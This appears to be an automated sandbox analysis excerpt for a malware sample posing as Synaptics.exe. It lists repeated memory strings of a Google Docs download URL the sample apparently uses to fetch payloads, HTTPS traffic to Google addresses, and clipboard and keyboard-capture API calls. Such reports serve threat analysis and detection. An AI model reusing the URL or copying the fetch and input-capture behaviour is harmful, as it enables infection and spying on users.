                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgooglesandbox-cn.com
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgr
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007BDF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhPC-Y
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhc=/&
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhj7(
                              Source: Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi/
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiS
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadic
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadin4
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadion
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjP
                              Source: Synaptics.exe, 00000003.00000002.1804199297.000000000054D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjecte
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjo1/D
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1814105855.0000000007A2C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.000000000054D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk&expq
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkT
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000594000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1404566857.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl.
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle&
                              Source: Synaptics.exe, 00000003.00000002.1834388588.000000000F079000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlx
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.000000000051D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadm-facqm
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadmV
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000594000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1404566857.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn%1
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnW
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnc
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnp
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadny
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado-stdo9
                              Source: Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogle.
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoj./F
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom:)Os
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogl
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle
                              Source: Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadot
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.000000000054D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpp
                              Source: Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpt
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpu
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007B41000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                              Source: Synaptics.exe, 00000003.00000003.1441798658.0000000000593000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000594000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1404566857.00000000005A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr%
                              Source: Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrSYs
                              Source: Synaptics.exe, 00000003.00000002.1833098836.000000000EFCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrj
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadro
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrojec
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrt-ur-
                              Source: Synaptics.exe, 00000003.00000002.1832097096.000000000EF52000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1835707471.000000000F12A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.000000000051D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1804199297.0000000000565000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1815613823.0000000007ABB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1441798658.000000000057F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                              Source: Synaptics.exe, 00000003.00000003.1439557060.0000000005333000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1808081146.0000000005339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads.cn
                              Source: Synaptics.exe, 00000003.00000002.1804199297.000000000054D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads.doQ
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads/
                              Source: Synaptics.exe, 00000003.00000002.1815613823.0000000007B83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsS
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49762 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49761 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49777 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49778 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49787 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49788 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49826 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49825 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49838 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49836 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49845 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49847 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49878 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49879 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49892 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49893 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49890 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49891 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49912 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49913 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49914 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49920 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49948 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49950 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49976 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49977 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49983 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:49984 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49991 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:49993 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:50001 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:50005 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:50030 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.11:50032 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:50073 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.2.11:50075 version: TLS 1.2
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00AE7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00AE7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 10_2_00787294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00AD4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00AFF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
